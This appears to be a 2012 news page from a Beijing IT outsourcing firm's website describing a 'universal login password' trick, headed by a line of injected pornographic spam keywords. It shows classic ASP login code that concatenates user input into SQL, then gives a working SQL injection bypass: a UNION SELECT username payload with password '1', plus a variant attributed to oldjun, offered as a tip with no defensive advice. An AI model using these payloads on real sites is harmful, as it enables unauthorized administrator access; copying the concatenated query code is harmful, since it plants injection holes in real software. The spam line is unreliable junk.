国产女人18毛片水真多,狠狠噜天天噜日日噜,18无码粉嫩小泬无套在线观看,久久国产劲爆∧v内射,人妻有码中文字幕

 
 
 
首 頁
下載中心
站內(nèi)搜索
新聞中心│News center
行業(yè)新聞
最新公告
最新公告│Announcement
IT外包首選我們的八大理由...
中國勞科院與我公司續(xù)簽了...
感謝中成航宇與我們公司續(xù)...
感謝深圳市城市空間規(guī)劃建...
 
詳細(xì)內(nèi)容
當(dāng)前位置:首 頁 >> 新聞中心 >> 詳細(xì)內(nèi)容
 
 
詳細(xì)內(nèi)容  
 
 
新型萬能登錄密碼
發(fā)布時間:2012-12-20 | 點(diǎn)擊次數(shù):2307
  
 
    網(wǎng)上有很多這樣的登陸驗(yàn)證代碼
  <%
  username=trim(Request.Form("username"))
  password=trim(Request.Form("password"))
  sql="Select * FROM admin Where user='"&username&"'"
  Set rs=Server.CreateObject("adodb.recordset")
  rs.Open sql,conn,1,1
  if rs.eof then
  checksysUser=FALSE
  else
  passwd=trim(rs("pwd"))
  if passwd=password then
  Session("admin")=username
  checksysUser=TRUE
  else
  checksysUser=FALSE
  end if
  End if
  rs.close
  conn.close
  if checksysUser=true then
  Response.Redirect("main.asp")
  else
  errmsg="<font color=#FF0000><b>用戶名輸入有誤,請重新輸入!</b></font>"
  end if
  %>
  先在數(shù)據(jù)庫中查詢用戶名對應(yīng)的密碼,然后再和用戶輸入的密碼對比,導(dǎo)致'or'='or'這樣的萬能登陸密碼失
  效.但如果在上面的程序中,用戶名輸入' union   select 1,1,1 FROM admin Where ''=',密碼輸入1,就可以登陸成功,原理很簡單,就不多說了.順便附上oldjun的語句:' union   select 1,1,1 AS pwd FROM admin Where ''=  
編輯:北京信誠IT保姆IT外包部 http:// www.fouzheng.cn www.xcit.com.cn
 
關(guān)閉
  友情鏈接
深圳無線覆蓋 廣信鴻業(yè) 昊瑞爾科技 及好科技 信諾IT服務(wù) 北京IT外包 無線覆蓋 起秀網(wǎng)絡(luò)
版權(quán)所有:北京信誠眾業(yè)科技有限公司 總部:010-62075251 400-698-1290 技術(shù)支持:010-62365952
地址:北京市北三環(huán)中路2號匯鑫祥源大廈328室 京ICP備09096604-3號